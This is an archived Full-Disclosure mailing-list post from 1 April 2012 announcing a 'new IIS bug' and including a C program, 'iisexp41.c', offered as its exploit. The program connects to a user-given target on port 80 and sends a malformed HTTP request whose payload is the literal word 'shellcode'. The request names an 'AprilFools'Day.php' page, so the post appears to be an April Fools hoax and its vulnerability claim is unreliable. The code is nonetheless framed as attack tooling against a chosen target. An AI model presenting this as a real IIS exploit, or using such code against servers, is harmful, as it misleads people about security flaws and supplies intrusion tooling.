lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun, 1 Apr 2012 07:51:09 +0000 From: yuange <yuange1975@...mail.com> To: full-disclosure <full-disclosure@...ts.grok.org.uk> Subject: FW: iis bug the exp file. /* iisexp41.c ver4.1 copy by @yuange1975 2012.4.1 假作真时真亦假。 http://weibo.com/yuange1975 http://twitter.com/yuange75 http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html */ #include <stdio.h> #include <stdlib.h>#include <winsock2.h> #include <windows.h> #include <mswsock.h> #include <wsnwlink.h> #include <ws2tcpip.h> #include <process.h> /* _beginthread, _endthread */ #include <errno.h> #include <io.h> #include <conio.h>#pragma comment(lib,"ws2_32") #pragma comment(lib,"Mswsock")char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n"; static unsigned int maybe_lookup_host(char* name) { unsigned long ulAddr = INADDR_NONE; /* Don't bother resolving raw IP addresses, naturally. */ ulAddr = inet_addr((char*)name); if ( ulAddr != INADDR_NONE && ulAddr != INADDR_ANY ) return (unsigned int)ulAddr; return 0; }int do_exp(char *hostname,unsigned int port) { SOCKET hScoket = INVALID_SOCKET; struct sockaddr_in sin; unsigned int addr=0; int write_res = 0; char * crash_buf=NULL; int crash_buflen=0; /* create SOCKET */ hScoket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/); if (hScoket == INVALID_SOCKET) { printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() ); return -1; } /* Resolved IP address */ addr = maybe_lookup_host(hostname); sin.sin_family = AF_INET; sin.sin_port = htons(port); memcpy(&sin.sin_addr,&addr,4); /* connect */ if ( connect(hScoket, (struct sockaddr*) &sin, sizeof(struct sockaddr_in) ) == SOCKET_ERROR) { if ( WSAEWOULDBLOCK != WSAGetLastError() ) { closesocket(hScoket); printf_s("connect function failed with error: %ld\n", WSAGetLastError()); return -1; } } printf("[*] connected to %s:%d\n",hostname,port); //build_crash_package(&crash_buf,&crash_buflen); crash_buf = AprilFoolsDay; crash_buflen = strlen(AprilFoolsDay); /* send data to remote target */ write_res = send( hScoket, crash_buf, crash_buflen, 0); printf("[*] send %d bytes\n",write_res); closesocket(hScoket); return 0; }int main(int argc, const char **argv) { int iResult; int count=0; char * target_ip = (char*)argv[1]; WSADATA wsaData; if ( !target_ip || argc < 2 ) { printf_s("usage: <target_ip>\n"); return 0; } /* Initialize Winsock */ iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); if (iResult != 0) { printf_s("WSAStartup failed: %d\n", iResult); return -1; } do_exp(target_ip,80); /* clean - win socket */ WSACleanup(); return 0; } From: yuange1975@...mail.com To: full-disclosure@...ts.grok.org.uk Subject: iis bug Date: Sun, 1 Apr 2012 03:30:29 +0000 iis new bug: http://weibo.com/yuange1975 poc: char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:http://weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n"; Content of type "text/html" skipped View attachment "iisexp41.c" of type "text/plain" (2879 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists